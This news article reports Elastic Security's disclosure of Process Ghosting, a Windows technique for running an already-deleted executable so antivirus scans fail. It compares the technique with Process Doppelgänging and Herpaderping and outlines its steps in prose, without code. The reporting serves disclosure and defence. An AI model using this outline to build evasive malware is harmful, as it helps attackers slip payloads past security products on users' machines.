Elastic Security has described a new attack method called Process Ghosting, which can potentially be used by hackers to bypass security and execute malicious code on Windows systems.
Process Ghosting is an executable file modification technique that allows an attacker to write malicious code to disk in a way that makes it difficult to scan or remove. Moreover, it allows you to run already deleted executable files.
The new method expands the list of well-known security bypass techniques such as Process Doppelgänging and Process Herpaderping.
Process Doppelgänging is similar to the Process Hollowing technique (allows you to create pending processes and replace the process image with an image that you want to hide). Process Doppelgänging works by using two key functions to mask the loading of a modified executable. The malicious code used in the attack is never saved to disk, making it overlooked by most popular security solutions.
The Process Herpaderping technique allows you to hide the behaviour of a running process by modifying the executable file on disk after it has been projected into memory.
As the experts explain, the bypass works because of the “gap between the creation of a process and notifying security solutions of its creation,” which gives virus writers time to modify the executable file before it is scanned by security products.
The Process Ghosting method goes even further – it lets you run executables that have already been removed. The technique is based on the fact that Windows prevents attempts to modify or delete the displayed file only after it has been projected into the “image” section.
“This means that it is possible to create a file, mark it for deletion, a project to an image partition, close the file descriptor to complete the deletion, and then create a process from the now fileless partition. This is Process Ghosting, ”the researchers explained.
The experts demonstrated the method using the example of Windows Defender in a scenario where Defender tries to open a malicious payload for scanning, but is unsuccessful because the file is in a deletion state. Retries also fail because the file has already been deleted. As a result, the payload (ghost.exe) runs smoothly.
Researchers informed the Microsoft Security Response Center (MSRC) team of their findings in May this year, but the company said the issue does not meet criteria requiring the release of a security update or instructions to prevent attacks.
Catch up on more articles here
Follow us on Twitter here